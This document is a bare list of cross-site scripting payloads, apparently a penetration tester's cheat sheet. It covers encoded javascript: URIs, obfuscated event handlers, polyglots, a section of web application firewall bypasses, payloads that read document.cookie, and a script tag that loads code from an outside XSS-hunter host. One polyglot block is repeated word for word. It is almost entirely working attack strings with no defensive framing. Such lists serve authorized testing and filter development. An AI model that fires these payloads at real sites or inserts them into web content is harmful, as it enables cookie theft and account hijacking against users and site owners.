XSS payloads

→%09Jav%09ascript:alert(1)

→javascript://%250Alert(1)

→/%09/javascript:alert(1);

→//%5cjavascript:alert(1);

→<>javascript:alert(1);

→//javascript:alert(1);

→\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)

lookhere');});</script><img src=x onerror=alert('XSS')>

<script src=//24.xss.ht>

'-alert(1)-'
"-alert(1)-"
";alert(1)//

"/><svg onauxclick=&#x63&#x6F&#x5C&#x75&#x30&#x30&#x36&#x65&#x66&#x69&#x72&#x6D(\\1\\)>

\&#34;+confirm(1)+&#34; 

<math><annotation-xml encoding=text/html><![CDATA[></math><!]]>
<script>var name="&quot;-alert``//"</sc

<fieldset//%00//onsite OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/AAAA/`>

//%250Aalert?.(1)//
'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!-->
</Title/</Style/</Script/</textArea/</iFrame/</noScript>
\74k<K/contentEditable/autoFocus/OnFocus=
/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->

"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F

//%250Aalert?.(1)//
'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!-->
</Title/</Style/</Script/</textArea/</iFrame/</noScript>
\74k<K/contentEditable/autoFocus/OnFocus=
/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->

WAF bypass

<!--><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27>

">>" ></plaintext ></| ><plaintext/onmouseover=prompt(1) >Tryharder'-->" >"><img/id="confirm( 'CTRL')"/alt="/"src="/"onerror=eval(id)>'">

'"><script>alert(document.cookie)</script>
